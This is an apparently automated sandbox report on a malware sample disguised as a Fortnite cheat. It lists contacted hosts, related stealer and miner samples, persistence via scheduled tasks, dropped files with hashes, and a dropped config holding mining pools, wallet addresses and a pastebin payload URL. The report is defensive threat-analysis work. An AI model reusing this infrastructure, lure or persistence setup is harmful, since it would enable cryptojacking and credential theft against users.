http://pastebin.com	6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.0000000003438000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	FortniteHack.exe1.exe, 00000002.00000003.1223744469.00000000035B8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pastebin.com	6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.0000000003426000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	FortniteHack.exe1.exe, 00000002.00000003.1223744469.00000000035B8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.51/WinRing0x64.sysChttps://pastebin.com/raw/YpJeSRBC	FortniteHack.exe1.exe, 00000002.00000003.2023753844.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023418275.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023196435.00000000035B1000.00000004.00000800.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023358262.0000000000C94000.00000004.00000020.00020000.00000000.sdmp, 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000000.1423389973.0000000000ED2000.00000002.00000001.01000000.00000008.sdmp, 6Y9CVTAOHZQ67PGGTWC454FW0.exe.2.dr	false		high
http://crl.microsoft.p	FortniteHack.exe1.exe, 00000002.00000003.1335422075.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000002.2434699473.0000000000C0B000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1335692308.0000000000C0A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.19.24	pastebin.com	United States	13335	CLOUDFLARENETUS	false
188.114.96.3	citydisco.bet	European Union	13335	CLOUDFLARENETUS	false
185.215.113.51	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1637277
Start date and time:	2025-03-13 13:34:22 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FortniteHack.exe1.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.mine.winEXE@33/17@2/3
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 98% Number of executed functions: 18 Number of non-executed functions: 138
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.92.180.205, 40.126.32.74, 23.60.203.209, 20.12.23.50
Excluded domains from analysis (whitelisted): onedsblobvmssprdeus04.eastus.cloudapp.azure.com, fs.microsoft.com, login.live.com, slscr.update.microsoft.com, otelrules.svc.static.microsoft, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7688 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
08:35:14	API Interceptor	8x Sleep call for process: FortniteHack.exe1.exe modified
08:35:20	API Interceptor	1x Sleep call for process: WerFault.exe modified
08:35:36	API Interceptor	14x Sleep call for process: powershell.exe modified
08:35:39	API Interceptor	15x Sleep call for process: 6Y9CVTAOHZQ67PGGTWC454FW0.exe modified
13:35:42	Task Scheduler	Run new task: dllhost path: C:\ProgramData\Dllhost\dllhost.exe
13:35:42	Task Scheduler	Run new task: NvStrayService_bk4422 path: C:\ProgramData\Dllhost\dllhost.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.19.24	rrats.exe	Get hash	malicious	AsyncRAT	Browse	pastebin.com/raw/KKpnJShN
	sys_upd.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_menu..ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm2.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_phshop..ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	VvPrGsGGWH.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	pastebin.com/raw/sA04Mwk2
	HQsitBLlOv.dll	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	xK44OOt7vD.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	steamcodegenerator.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_hiddenz.ps1	Get hash	malicious	AsyncRAT, XWorm	Browse	pastebin.com/raw/sA04Mwk2
188.114.96.3	kVPzMgJglW.exe	Get hash	malicious	FormBook	Browse	www.serenityos.dev/dntg/
	tnZI8EzSx3.exe	Get hash	malicious	FormBook	Browse	www.fkrvhaupjtc.info/sdhm/
	7zKn77RsRX.exe	Get hash	malicious	FormBook	Browse	www.serenityos.dev/dntg/
	hQaXUS5gt0.exe	Get hash	malicious	FormBook	Browse	www.serenityos.dev/dntg/
	zzSk99EqY0.exe	Get hash	malicious	FormBook	Browse	www.fkrvhaupjtc.info/sdhm/
	2k3GtCY6Zz.exe	Get hash	malicious	FormBook	Browse	www.fkrvhaupjtc.info/nhmj/
	3tEL1ZRXA6.exe	Get hash	malicious	FormBook	Browse	www.marposet.shop/6ixs/?Ar6T=oN0T/Esi7H2jJ4TMjw8b93BQPnEdNzyQiBUPeT1k8Z/eibB9ghV+qpvP7NsuhjacLnuX6HraU4xmdMUu2umYnCC8s1rtYFvj99qSyPPCwvQggIKSHQ==&Lfpd=o6ndcl
	2rvyZc27tz.exe	Get hash	malicious	FormBook	Browse	www.timeinsardinia.info/50g8/
	INVOICE 4562.exe	Get hash	malicious	FormBook	Browse	www.timeinsardinia.info/jjft/
	Payment-031025-pdf.exe	Get hash	malicious	FormBook	Browse	www.ezjytrkuqlw.info/zsr7/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
citydisco.bet	setupx 1.exe1.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	188.114.97.3
	Installer64x.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	setupx 2.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	ModMenu.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	SoftWare(2).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	SoftWare(1).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	Galaxy Swapper v2.0.3.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	13s1HMkHKv.exe	Get hash	malicious	Amadey, DarkVision Rat, Fallen Miner, LummaC Stealer	Browse	188.114.96.3
	SoftWare(1).exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	Kiddion's Modest Menu v.1.0.0.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	188.114.96.3
pastebin.com	setupx 1.exe1.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	172.67.19.24
	Steam.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	104.20.3.235
	Kiddion's Modest Menu v.1.0.0.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	172.67.19.24
	Venom.6.0.3.exe	Get hash	malicious	XWorm	Browse	172.67.19.24
	svchost.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	104.20.3.235
	config.exe	Get hash	malicious	XWorm	Browse	104.20.3.235
	nbtypsfikkad.exe	Get hash	malicious	Xmrig	Browse	104.20.3.235
	biopderfawd.exe	Get hash	malicious	Xmrig	Browse	104.20.3.235
	#Ud835#Udde6#Ud835#Uddd8#Ud835#Udde7#Ud835#Udde8#Ud835#Udde3.exe	Get hash	malicious	LummaC Stealer	Browse	104.20.3.235
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.20.4.235

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	NDQ211216GM08.exe.bin.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	setupx 1.exe1.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	172.67.19.24
	Installer64x.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	setupx 2.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	ModMenu.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	SoftWare(2).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	SimpleLoader v2.1.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.144.37
	SoftWare(1).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	https://llttfr.boa.ink/?fr=gemma.inglis@heritageportfolio.co.uk	Get hash	malicious	Unknown	Browse	104.17.25.14
	2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
WHOLESALECONNECTIONSNL	setupx 1.exe1.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	185.215.113.51
	Installer64x.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.51
	SoftWare(2).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.51
	Kiddion's Modest Menu v.1.0.0.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	185.215.113.51
	file.exe	Get hash	malicious	Unknown	Browse	185.215.113.39
	Inst#U0430ll.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	185.215.113.51
	a0RkmvhSaf.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66
	Setup.exe	Get hash	malicious	Xmrig	Browse	185.215.113.51
	mQRr8Rkorf.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16
	random(1).exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.115
CLOUDFLARENETUS	NDQ211216GM08.exe.bin.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	setupx 1.exe1.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	172.67.19.24
	Installer64x.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	setupx 2.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	ModMenu.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	SoftWare(2).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	SimpleLoader v2.1.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.144.37
	SoftWare(1).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	https://llttfr.boa.ink/?fr=gemma.inglis@heritageportfolio.co.uk	Get hash	malicious	Unknown	Browse	104.17.25.14
	2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	NDQ211216GM08.exe.bin.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.19.24
	setupx 1.exe1.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	172.67.19.24
	2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.19.24
	Steam.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	172.67.19.24
	SOA Since OCT DEC 241738316681530012900.bat	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.19.24
	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Get hash	malicious	GhostRat, ValleyRAT	Browse	172.67.19.24
	SecuriteInfo.com.Win32.DropperX-gen.23511.10885.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.19.24
	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Get hash	malicious	Unknown	Browse	172.67.19.24
	#U70b9#U51fb#U6b64#U5904-#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U53051.exe	Get hash	malicious	Unknown	Browse	172.67.19.24
	uy2g7z.bat	Get hash	malicious	Unknown	Browse	172.67.19.24
a0e9f5d64349fb13191bc781f81f42e1	setupx 1.exe1.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	188.114.96.3
	Installer64x.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	setupx 2.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	ModMenu.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	SoftWare(2).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	SimpleLoader v2.1.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	SoftWare(1).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	script5.ps1	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	PO #S149102025.xlsx	Get hash	malicious	Unknown	Browse	188.114.96.3
	ppcore.dll.dll	Get hash	malicious	Unknown	Browse	188.114.96.3

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\Dllhost\WinRing0x64.sys	setupx 1.exe1.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse
	Kiddion's Modest Menu v.1.0.0.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse
	stelarix.exe	Get hash	malicious	Xmrig	Browse
	nbtypsfikkad.exe	Get hash	malicious	Xmrig	Browse
	biopderfawd.exe	Get hash	malicious	Xmrig	Browse
	SecuriteInfo.com.Trojan.Inject5.18019.4796.15988.exe	Get hash	malicious	Xmrig	Browse
	vHl9kBfoX9.exe	Get hash	malicious	Xmrig	Browse
	vHl9kBfoX9.exe	Get hash	malicious	Unknown	Browse
	5JIEYPkSVW.exe	Get hash	malicious	Xmrig	Browse
	External.exe1.exe	Get hash	malicious	Xmrig	Browse

Created / dropped Files

C:\ProgramData\Dllhost\WinRing0x64.sys

Download File

Process:	C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: setupx 1.exe1.exe, Detection: malicious, Browse Filename: Kiddion's Modest Menu v.1.0.0.exe, Detection: malicious, Browse Filename: stelarix.exe, Detection: malicious, Browse Filename: nbtypsfikkad.exe, Detection: malicious, Browse Filename: biopderfawd.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.Inject5.18019.4796.15988.exe, Detection: malicious, Browse Filename: vHl9kBfoX9.exe, Detection: malicious, Browse Filename: vHl9kBfoX9.exe, Detection: malicious, Browse Filename: 5JIEYPkSVW.exe, Detection: malicious, Browse Filename: External.exe1.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\ProgramData\Dllhost\winlogson.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe
File Type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category:	modified
Size (bytes):	709319
Entropy (8bit):	6.158667997711498
Encrypted:	false
SSDEEP:	12288:gA2oZq+VNXKLgNsUPAM8v5DJf87HiYid8/GPFJAQnYeOs9pBgP9kilmpOLxTp/Bp:gKpN5NsUPAFv5907H5iHxnY+9pB4j99p
MD5:	329A38B2736915A3FE0E836377621D29
SHA1:	98F7EA5B60425EFCC539F3D4379EB078AC622E39
SHA-256:	E28ABC31E1447D30E3D599B8A569C688A96F56BF6B33B210158E2E913931015E
SHA-512:	39E564F557EB9C84B6F14E87B40317341E587783D1EA46AB4661736367569D35287EE614119992E89F8C766882AF77EAAB3F55AAF64816E71487831FBA8AA7DD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....c.d...............&.._...}...2............@.............................0......L\|~...`... .................................................F...@...\....v.................l...........................`.t.(......................@............................text....._......._.................`..`.data...`.... _...... _.............@....rdata.......0`......&`.............@..@.pdata........v.......v.............@..@.xdata........y.......x.............@..@.bss......2...\|..........................idata...F......H....\|.............@....CRT....h.... ........\|.............@....tls.........0........\|.............@....rsrc....\...@...\....\|.............@....reloc..l............X}.............@..B........................................................................................................................................................................

C:\ProgramData\HostData\logs.uce

Download File

Process:	C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	344
Entropy (8bit):	5.688678537167479
Encrypted:	false
SSDEEP:	6:DiYgE/ovKDMcPmriYgE/ovKDMcBCrT5fhXGT2QSBa5ydXnzAiGUlQPoy68f1KAK3:uwgyXmGwgyoH55GT2Qtyc3n1KAU
MD5:	1A4E05716C2A8B7A5F34172178340305
SHA1:	2E1A747A57E99B7FA2F691568104C5431F79A849
SHA-256:	FB42753CE0F515D7E4BF6B3C86895CC14FC59BE6A1A81D429A34B88F48286173
SHA-512:	41D18BDA9117C3F0162F5ACA3C63FE139A38ED4A419619992C258CF1107BF4C2D0EC9B9CFB402D19347FE4C50CFEA0ED6FBD4602781027B725463C613E0837CA
Malicious:	false
Preview:	ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..XMR..pool.hashvault.pro:443..ZEPHYR3c6xGj8D5oP4tzKQbPn2dNdse6aPRWxNBiwBFrg7RFN4jf1cqgj5qdR9Wdru44g2FATJHHH38oFDTH6krgKntSzLc5Csy3t..Dnepr..F(Ff4f67h((jgf..cp..https://pastebin.com/raw/YpJeSRBC..

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_FortniteHack.exe_77e1171ff451da10852a4338d6cafd15dac29fca_626e8a90_b8a231f8-c2d9-4ed8-8bea-c60f0fa0f86a\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7278153189906267
Encrypted:	false
SSDEEP:	96:iOFOuR4tcfwuzWvtsKZh+oI7Rs6tQXIDcQvc6QcEVcw3cE/H33+HbHg/TgJ3YOZz:lTfYVN0BU/gj/+zuiFiZ24IO8m1
MD5:	03E0757FC4E8B092309FAD460C06FC6E
SHA1:	09369EEA559194463E447DE0A6E7276971817DDA
SHA-256:	15B033283455A38D5F080EE59CAE08B133E49899BCB65B9D6BBB707A7CE86B92
SHA-512:	F8E95E92E373A9454DC5325D5FD1C00D31B394689084E86285652FD709B4D0928F8C091CE858BD25896E14D6172DF5DC10C369B232916813131C7A4E3711214D
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.3.4.2.9.1.2.2.2.1.9.7.6.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.3.4.2.9.1.2.6.4.3.8.5.5.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.8.a.2.3.1.f.8.-.c.2.d.9.-.4.e.d.8.-.8.b.e.a.-.c.6.0.f.0.f.a.0.f.8.6.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.c.d.e.4.4.d.6.-.6.4.9.4.-.4.6.d.7.-.8.6.c.2.-.9.e.9.7.1.d.e.4.8.2.d.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.F.o.r.t.n.i.t.e.H.a.c.k...e.x.e.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.1.c.-.0.0.0.1.-.0.0.1.8.-.5.b.3.3.-.c.7.5.c.1.4.9.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.a.0.4.5.8.5.6.e.1.3.8.e.6.9.7.f.1.9.6.a.b.e.0.8.c.c.0.4.2.1.4.0.0.0.0.f.f.f.f.!.0.0.0.0.d.a.4.5.6.3.3.2.6.0.1.8.1.5.c.e.5.2.d.c.b.b.2.9.0.8.d.1.b.2.3.b.3.5.4.7.a.a.b.6.!.F.o.r.t.n.i.t.e.H.a.c.k...e.x.e.1...e.x.e.....

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB381.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Mar 13 12:35:12 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	37636
Entropy (8bit):	1.7197000581827107
Encrypted:	false
SSDEEP:	96:5381/Z5LHFg48eoqhYypxwsi7OkLGniTlfxyDsAERXGA+Ujqs8WIkWI0EBIOf5rc:S11hhVxhOBQaWA+Uj/EK5rF7c
MD5:	D44AC89FD1FC865ACDAE7DC1222D09DC
SHA1:	A6A0BB8ACE53259CF3C00ED567D11F9CC931305B
SHA-256:	6EE70A9A5BCEEFECDDC78600F23BAB66DD7A6A2A58F140B658643013A81DCC7B
SHA-512:	64BFFD27B2E3870B7BD83BE9E761523F3BD097B40A7B1FA19B1AE80839320B3A0B15C3BBEFA47CFE4CB7A08EE39804D1FC648642275748F02CE23A19E567623C
Malicious:	false
Preview:	MDMP..a..... ..........g........................0...............t...........T.......8...........T...............,.......................................................................................................eJ......P.......GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB43D.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8426
Entropy (8bit):	3.6949302350010274
Encrypted:	false
SSDEEP:	192:R6l7wVeJyjY6T6YrRSUWzI/gmfRdprp89bojsfaYm:R6lXJEY6T6YNSUWzI/gmfRmoIfk
MD5:	EBE4FD5CB97C40D4D3957A64EADC097F
SHA1:	6D2823EA5BA08F00C349CCE29EED3561E7444190
SHA-256:	C66D7B38BB0DC515754489CA9F5FDD512C1E7866DD2573F3E8B319D25A960A2A
SHA-512:	61BFFB5C4914E1CEC59BCE06959D1DD7A90E25170CAD76E74AC786A18D6EB9C595F5FEBD61994A07442A56DECB3EDC75EFD1277FB8BC9426F62CDE8E36753E84
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.8.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB47D.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4755
Entropy (8bit):	4.486897301895219
Encrypted:	false
SSDEEP:	48:cvIwWl8zs/Jg77aI9wLWpW8VYelYm8M4JjiFa1+q8vnR8o+ITTd:uIjfhI7W67V1UJr1KR8oDTTd
MD5:	8FE8C2C6B77E220D40FA45535B4F836D
SHA1:	3A2134CDB5916D1B39E64E85B4EDA78070BC9493
SHA-256:	C7F4E15F62B6C02FF0F86015076D766D2CE2DE43B4356A116C80FE51A6351E1A
SHA-512:	56C7E3A76D536B2C5BE4036436D5451B493CDD5546FB56213DACB0DDFD679F48D1823C42D430E6952D5BD122AED10DFE60B1F64A62F6AD03598A0B0711523524
Malicious:	false
